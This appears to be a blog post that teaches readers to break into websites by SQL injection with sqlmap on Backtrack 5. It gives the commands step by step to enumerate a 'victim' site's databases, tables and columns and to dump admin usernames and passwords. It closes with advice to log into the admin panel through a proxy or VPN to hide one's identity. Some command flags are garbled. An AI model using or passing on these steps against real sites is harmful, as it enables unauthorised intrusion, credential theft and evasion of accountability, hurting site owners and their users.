I am going to show
you how to hack website using Backtrack 5 (sqlmap). Sqlmap
is a automatic sql injection tool which helps you to hack website
easily. Follow thesimple steps to hack website using backtrack 5
sqlmap tool.
1. Open your backtrack terminal and
type cd /pentest/database/sqlmap and hit enter. Now
sqlmap is open in your terminal
2.
Now find the vulnerable site. (well I already have vulnerable site)
3. Now type this command in the
terminal and hit enter.(refer above figure)
python sqlmap.py
-u http://yourvictim’slink/index.php? id=4 –dbs
4. Now you will get
the database name of the website
Well I got the two database aj and information_schema we
will select aj database.
5. Now get the tables of that database. for that
you need to enter this command into your terminal and simply hit
Enter.
python sqlmap.py
-u http://yourvictim’slink/index.php?id=4 -D
(database name) –tables
6. Now we need to grab the tables from the aj
database. paste this command bellow command and hit enter.
python sqlmap.py
-u http://www.yourvictim’slink.com/index.php?id=4 -D
aj –tables
7.
Now you will get the tables list which is stored in aj database.
8. Now lets grab the columns from the admin
table
python sqlmap.py
-u http://www.yourvictim’slink.com/index.php?id=4 -T
admin –columns
Now we got the columns and we got username and
password.
9. Now lets grab the passwords of the admin
python sqlmap.py
-u http://www.yourvictim’slink.com/index.php?id=4 -T
admin -U test –dump
Now we got the username and
the password of the website !
Now
just find the admin panel of the website and use proxy/vpn when you are
trying to login in the website as a admin.
No comments:
Post a Comment